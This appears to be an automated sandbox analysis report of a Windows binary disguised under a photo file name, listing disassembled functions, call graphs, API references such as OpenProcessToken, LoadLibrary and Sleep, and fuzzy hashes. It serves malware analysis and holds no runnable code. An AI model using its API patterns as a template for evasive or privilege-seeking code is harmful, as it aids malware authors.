                                                                control_flow_graph 1007 401a22-401a2e 1008 401a30-401a35 call 4890a5 1007->1008 1009 401a3a-401a3f 1007->1009 1008->1009 1010 401a41-401a46 call 4018ff 1009->1010 1011 401a4d-401a51 1009->1011 1016 401a4b 1010->1016 1014 401a53-401a56 1011->1014 1015 401a6e-401a70 1011->1015 1014->1015 1017 401a58-401a5d 1014->1017 1018 401a81-401a8b 1015->1018 1019 401a72-401a78 1015->1019 1016->1018 1020 401a61-401a6c call 4019e2 1017->1020 1021 401a5f 1017->1021 1022 401a7a 1019->1022 1023 401a7c-401a7e 1019->1023 1020->1018 1021->1020 1022->1023 1023->1018
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00401A35
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890BA
                                                                  • Part of subcall function 004890A5: __CxxThrowException@8.LIBCMT ref: 004890CF
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890E0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                • String ID: string too long
                                                                • API String ID: 1823113695-2556327735
                                                                • Opcode ID: 0a94ce01cbe278cfa4221d25ebbbf8ac7d6555b1dc718770a227dd5489c57f4b
                                                                • Instruction ID: f3ce84b0307f2fab1e31c217fae98e4e80379811acc3d9ecc5de677df0ffad8e
                                                                • Opcode Fuzzy Hash: 0a94ce01cbe278cfa4221d25ebbbf8ac7d6555b1dc718770a227dd5489c57f4b
                                                                • Instruction Fuzzy Hash: 95F022327423105BCB30ADB888C092B26D8AB62359B200D3FF442E31E0E679DC848B5D
                                                                Function 100078A8 Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1026 100078a8-100078bb 1027 100078c4-100078ee call 1000c4a0 call 10007777 1026->1027 1028 100078bd-100078bf 1026->1028 1034 100078f0-100078fb call 100075d8 1027->1034 1035 100078fd-10007901 1027->1035 1029 10007a20-10007a24 1028->1029 1034->1035 1044 10007903-10007906 call 1000770d 1034->1044 1037 10007915-1000791b 1035->1037 1038 1000791d-10007929 call 100076d1 1037->1038 1039 1000792f-10007935 1037->1039 1038->1039 1050 1000792b 1038->1050 1042 10007937-10007945 call 100076d1 1039->1042 1043 1000795e-10007964 1039->1043 1057 10007947-10007958 call 100076d1 1042->1057 1058 1000795a 1042->1058 1048 100079d0-100079d8 call 100075b7 1043->1048 1049 10007966-10007974 call 100076d1 1043->1049 1052 1000790b-1000790d 1044->1052 1063 100079dd-10007a1e call 1000ac8b call 10007c48 1048->1063 1049->1048 1061 10007976-1000797f 1049->1061 1050->1039 1059 10007913 1052->1059 1060 1000790f 1052->1060 1057->1043 1057->1058 1058->1043 1059->1037 1060->1059 1061->1048 1064 10007981-10007984 1061->1064 1063->1029 1064->1048 1067 10007986-10007989 1064->1067 1067->1048 1069 1000798b-10007998 call 1000770d 1067->1069 1069->1048 1074 1000799a-100079a4 call 1000770d 1069->1074 1074->1048 1077 100079a6-100079b5 call 100076d1 1074->1077 1077->1048 1080 100079b7-100079ce 1077->1080 1080->1048 1080->1063
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID:
                                                                • API String ID: 2102423945-0
                                                                • Opcode ID: 7213c61829fe7ab4cc5639b422b216faffa918b448852484d9944ef95b569b9c
                                                                • Instruction ID: d92c82a17bc2e3b55bf21d4e176e2411c74b9e9c773a553120c634e964016fd1
                                                                • Opcode Fuzzy Hash: 7213c61829fe7ab4cc5639b422b216faffa918b448852484d9944ef95b569b9c
                                                                • Instruction Fuzzy Hash: 1A419435E0021F9BEB20DF68C88169D7BB1FF413E4F21416AE41DA7199D774AE85CB90
                                                                Function 004018FF Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_catch_memmove
                                                                • String ID:
                                                                • API String ID: 3914490576-0
                                                                • Opcode ID: 643ef090feda719b87343d54545cd7d23521c818608f81ce91a6b44f70f67914
                                                                • Instruction ID: c0b256598ba32f3ba6cf55bb8716b9f92ccb98c7782aa6ea6f55525452b743ea
                                                                • Opcode Fuzzy Hash: 643ef090feda719b87343d54545cd7d23521c818608f81ce91a6b44f70f67914
                                                                • Instruction Fuzzy Hash: 5B2190B4B002009BDB24DF15C591A6E73B2FF81314B24853EE8929B3A0DB74AE05CB65
                                                                Function 004018B6 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::exception::exception.LIBCMT ref: 004018E3
                                                                • __CxxThrowException@8.LIBCMT ref: 004018F8
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 4063778783-0
                                                                • Opcode ID: 00c6d9ba5e98b0cc0ece0fd57436fb7d020f9928b89bbc5e83d04b83aad6ca33
                                                                • Instruction ID: bdc2bf6595e142c1db9d3e1dc68d7fdd6ea0ad91477ebb385ad31108f4561f9f
                                                                • Opcode Fuzzy Hash: 00c6d9ba5e98b0cc0ece0fd57436fb7d020f9928b89bbc5e83d04b83aad6ca33
                                                                • Instruction Fuzzy Hash: A7E06D7140030AAADB00F6A58846AEF73ECAB01358F500A7F9221E24D1EBB8D6099656
                                                                Function 1000B217 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___crtCorExitProcess.LIBCMT ref: 1000B21F
                                                                  • Part of subcall function 1000B1EC: GetModuleHandleW.KERNEL32(100175B8,?,1000B224,00000000,?,1000ACBA,000000FF,0000001E,00000001,00000000,00000000,?,1000F7D4,00000000,00000001,00000000), ref: 1000B1F6
                                                                  • Part of subcall function 1000B1EC: GetProcAddress.KERNEL32(00000000,100175A8), ref: 1000B206
                                                                • ExitProcess.KERNEL32 ref: 1000B228
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                • String ID:
                                                                • API String ID: 2427264223-0
                                                                • Opcode ID: 8be31fcdb33e2a27a179cff57672a67dc051748436262174480e8daa6fc77075
                                                                • Instruction ID: 0c398691cb2c61e119b2037d3b9694a9f1a6bd54b2035d192df400d143da81c5
                                                                • Opcode Fuzzy Hash: 8be31fcdb33e2a27a179cff57672a67dc051748436262174480e8daa6fc77075
                                                                • Instruction Fuzzy Hash: A3B09231000108BBEB052F66CC0E88A3F2AFB823A0B508020F81809131DF72EE92DAC0
                                                                Function 00401741 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID:
                                                                • API String ID: 4104443479-0
                                                                • Opcode ID: eea087aa17a58bd8edc77432cc7a3089b6b7818f800e0ce5d5eb1d06bf7a148f
                                                                • Instruction ID: f3494a24c1a5e8b7684ab7e92e21a4fe679465ce48e50fd2f04c9fd58677c612
                                                                • Opcode Fuzzy Hash: eea087aa17a58bd8edc77432cc7a3089b6b7818f800e0ce5d5eb1d06bf7a148f
                                                                • Instruction Fuzzy Hash: FA015E347146009BCA249E5DDD8592AB2F9EB85B05B10063FF842EB2E1D7789D0687AE
                                                                Function 1000F43C Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 1000F47F
                                                                  • Part of subcall function 1000D5B3: __getptd_noexit.LIBCMT ref: 1000D5B3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap__getptd_noexit
                                                                • String ID:
                                                                • API String ID: 328603210-0
                                                                • Opcode ID: b9ab960147d23513474b4100a206bd42b78dfdb9d472ef940afca64701825292
                                                                • Instruction ID: 18555b255917aa4239aff2dc14b2c3e1ae5005e647fe272880f05dcce407a6d9
                                                                • Opcode Fuzzy Hash: b9ab960147d23513474b4100a206bd42b78dfdb9d472ef940afca64701825292
                                                                • Instruction Fuzzy Hash: 3401B1352006669AFB55DF25CC44B7B3799EB817F4F02852DEC16CAA98DB34D8019690
                                                                Function 100082D0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentDirectoryA.KERNEL32(00000103,00000140,000000FE,?,10008E1B,?,00000004,10009892,?,?,00000334,10003B86,?), ref: 100082EB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory
                                                                • String ID:
                                                                • API String ID: 1611563598-0
                                                                • Opcode ID: 029ce26c42503f411c6da66abf63d6902ae0843b81772625349de17e0df78806
                                                                • Instruction ID: 2bd18c3c5c48994b0759f2170f5e03fd91e5a32878fdb19b6ee32b226c9c7334
                                                                • Opcode Fuzzy Hash: 029ce26c42503f411c6da66abf63d6902ae0843b81772625349de17e0df78806
                                                                • Instruction Fuzzy Hash: EA01BC32500B46DAF721CA24C819BDA37E5FB81BE0F504139E6D98B2A6DB34EB49C754
                                                                Function 100075D8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,1000778E,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 10007604
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID:
                                                                • API String ID: 973152223-0
                                                                • Opcode ID: 8cd482582f1ce7a99dd7b2103359b883ceae031772ed6ae8337ac228d584bfe8
                                                                • Instruction ID: e16feed323ec4c7c274b6ef0c638263ac2504f4610d025434aa4a630ed971512
                                                                • Opcode Fuzzy Hash: 8cd482582f1ce7a99dd7b2103359b883ceae031772ed6ae8337ac228d584bfe8
                                                                • Instruction Fuzzy Hash: 6AF049B0C168D29EFB3CCB0C8814CA9AA95FB513D1B1784AAF40E5B019DA168D40DED0
                                                                Function 10007637 Relevance: 1.5, APIs: 1, Instructions: 40fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNEL32(FA83E855,?,00000001,00000001,00000000,?,?,1000784E,?,00000404,00000001,00000000,?,00000000), ref: 10007654
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: a22246be6a0a317918d3aec1459a55e227aa439c2a33235ff47fabf9bc56f2fd
                                                                • Instruction ID: 328655b20b46c7854057dbc1cba60e0a6219c51e05292851d0bcd8ded7bd93b6
                                                                • Opcode Fuzzy Hash: a22246be6a0a317918d3aec1459a55e227aa439c2a33235ff47fabf9bc56f2fd
                                                                • Instruction Fuzzy Hash: EB01AD72600606AFE720CE19CC40A9ABBFAFB90284F018529F88AC6650D732FD55CB50
                                                                Function 10008DDD Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 10008DE4
                                                                  • Part of subcall function 1000B4C8: _malloc.LIBCMT ref: 1000B4E2
                                                                  • Part of subcall function 1000B4C8: std::exception::exception.LIBCMT ref: 1000B517
                                                                  • Part of subcall function 1000B4C8: std::exception::exception.LIBCMT ref: 1000B531
                                                                  • Part of subcall function 1000B4C8: __CxxThrowException@8.LIBCMT ref: 1000B542
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8H_prolog3Throw_malloc
                                                                • String ID:
                                                                • API String ID: 2311266369-0
                                                                • Opcode ID: 3e26b86e5b1279afbabf400b168812a23bb727ffa361dbb07856a53d066e0e6f
                                                                • Instruction ID: 74ea03d92b69d70e6f829631c4c0e15115dc5039482fcea8e7a8f5e451d479b6
                                                                • Opcode Fuzzy Hash: 3e26b86e5b1279afbabf400b168812a23bb727ffa361dbb07856a53d066e0e6f
                                                                • Instruction Fuzzy Hash: 5AF09035902A659AFB51DFA0D80675D3AA0FF00BF0F518604F8C8AF2DADBB09F408791
                                                                Function 004017BC Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID:
                                                                • API String ID: 176396367-0
                                                                • Opcode ID: c6da60cf44ca98767419f8e4178deaf088a29810e9e40dbe86d298248153a674
                                                                • Instruction ID: bce65496d7ee78f8191b7b06e3f85f1e672ebada011d69647835fd4b1c7b7862
                                                                • Opcode Fuzzy Hash: c6da60cf44ca98767419f8e4178deaf088a29810e9e40dbe86d298248153a674
                                                                • Instruction Fuzzy Hash: 4ED05B3110031497C720AF65D805746BBE4EF003A9F00452FF94887650DB79A554C7D9
                                                                Function 1000A25F Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 1000B4E2
                                                                  • Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
                                                                  • Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
                                                                  • Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_malloc
                                                                • String ID:
                                                                • API String ID: 501242067-0
                                                                • Opcode ID: a523410b075b2e507e2f936f435e68be10a21365df9e364fe8a36f9bc3a6ea08
                                                                • Instruction ID: af73953911b8e8f7bba65e66bbeb0c349d045db87309e00b0f615e81207c2e39
                                                                • Opcode Fuzzy Hash: a523410b075b2e507e2f936f435e68be10a21365df9e364fe8a36f9bc3a6ea08
                                                                • Instruction Fuzzy Hash: 34C02221004A08233630A81A980682A3B8CC7C24E07610010EC040208BDC50ED1280E1
                                                                Function 1000B46F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _doexit.LIBCMT ref: 1000B47B
                                                                  • Part of subcall function 1000B32F: __lock.LIBCMT ref: 1000B33D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __lock_doexit
                                                                • String ID:
                                                                • API String ID: 368792745-0
                                                                • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                • Instruction ID: 3811ae51bb16a7fbefe7461ba190c25b745f10d60d0fc6846b8c26432b0ebc89
                                                                • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                • Instruction Fuzzy Hash: 6DB0123258030C33EA201E42EC03F163F1DC7C0BA0F740020FA0C1D2E1A9A3BA6190C9
                                                                Function 10007072 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _calloc
                                                                • String ID:
                                                                • API String ID: 1679841372-0
                                                                • Opcode ID: 6fbe30c6f210a50f799fcab12581603f26f4a8b3ac0063225e078c4a9166d02b
                                                                • Instruction ID: c8d80f786f7d054e37de60efd03ea03daa2671600acf41333a91e997b5ba6f52
                                                                • Opcode Fuzzy Hash: 6fbe30c6f210a50f799fcab12581603f26f4a8b3ac0063225e078c4a9166d02b
                                                                • Instruction Fuzzy Hash: 3FB0123300C30D7FAF055E81FC038593BEDEB40574B20401AF91C050616E33B530564C

                                                                Non-executed Functions

                                                                Function 0247324F Relevance: 192.1, APIs: 63, Strings: 46, Instructions: 1341sleepregistrylibraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 024733B5
                                                                • _memset.LIBCMT ref: 024734DB
                                                                • _memset.LIBCMT ref: 02473603
                                                                • __time64.LIBCMT ref: 02473623
                                                                • _memset.LIBCMT ref: 02473646
                                                                • _rand.LIBCMT ref: 0247364E
                                                                • _rand.LIBCMT ref: 02473668
                                                                • _memset.LIBCMT ref: 024736E6
                                                                • wsprintfA.USER32 ref: 0247370B
                                                                • _memset.LIBCMT ref: 02473722
                                                                • _memset.LIBCMT ref: 02473766
                                                                • wsprintfA.USER32 ref: 02473783
                                                                • _memset.LIBCMT ref: 024737D2
                                                                • wsprintfA.USER32 ref: 024737F8
                                                                • _memset.LIBCMT ref: 02473813
                                                                • Sleep.KERNEL32(00000001), ref: 02473832
                                                                • _memset.LIBCMT ref: 02473864
                                                                • wsprintfA.USER32 ref: 02473885
                                                                • _memset.LIBCMT ref: 0247389C
                                                                • Sleep.KERNEL32(00000001), ref: 024738BB
                                                                • _memset.LIBCMT ref: 024738E8
                                                                • wsprintfA.USER32 ref: 02473909
                                                                • _memset.LIBCMT ref: 02473920
                                                                  • Part of subcall function 024728BD: _memset.LIBCMT ref: 02472903
                                                                  • Part of subcall function 024728BD: _memset.LIBCMT ref: 02472915
                                                                  • Part of subcall function 024728BD: _memset.LIBCMT ref: 02472924
                                                                • Sleep.KERNEL32(000003F2), ref: 0247396C
                                                                • Sleep.KERNEL32(000003F2), ref: 0247399F
                                                                • Sleep.KERNEL32(000003F2), ref: 024739D2
                                                                • __time64.LIBCMT ref: 024739E0
                                                                • _memset.LIBCMT ref: 024739FE
                                                                • _rand.LIBCMT ref: 02473A08
                                                                • _memset.LIBCMT ref: 02473A37
                                                                • _memset.LIBCMT ref: 02473A95
                                                                  • Part of subcall function 02479828: __EH_prolog3_GS.LIBCMT ref: 02479832
                                                                  • Part of subcall function 02479828: wsprintfA.USER32 ref: 024798C1
                                                                  • Part of subcall function 02479828: OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 02479BFA
                                                                  • Part of subcall function 02472D6F: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02472D8B
                                                                  • Part of subcall function 02472D6F: GetFileSize.KERNEL32(00000000,00000000), ref: 02472D96
                                                                  • Part of subcall function 02472D6F: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02472DB1
                                                                • _memset.LIBCMT ref: 02473BD6
                                                                • _mbstowcs.LIBCMT ref: 02473BF3
                                                                  • Part of subcall function 0247A781: __mbstowcs_l_helper.LIBCMT ref: 0247A7A1
                                                                • _memset.LIBCMT ref: 02473C14
                                                                • _memset.LIBCMT ref: 02473C3B
                                                                • _strcat_s.LIBCMT ref: 02473C58
                                                                • FindWindowExA.USER32(00000000,00000000,?,00000000), ref: 02473C6B
                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000FB), ref: 02473C98
                                                                • _memset.LIBCMT ref: 0247432E
                                                                • LoadLibraryA.KERNEL32(?,?,00000000,000000F3), ref: 0247433E
                                                                • _memset.LIBCMT ref: 0247437F
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02474390
                                                                • _memset.LIBCMT ref: 024743BC
                                                                • GlobalAddAtomA.KERNEL32(?), ref: 02473E69
                                                                  • Part of subcall function 0247B473: _doexit.LIBCMT ref: 0247B47F
                                                                • _memset.LIBCMT ref: 02473EE2
                                                                • _memset.LIBCMT ref: 02473F5F
                                                                • _memset.LIBCMT ref: 02473FC2
                                                                  • Part of subcall function 024718EE: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 02471BD1
                                                                  • Part of subcall function 024718EE: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 02471BEF
                                                                  • Part of subcall function 024718EE: CloseHandle.KERNEL32(?), ref: 02471BFC
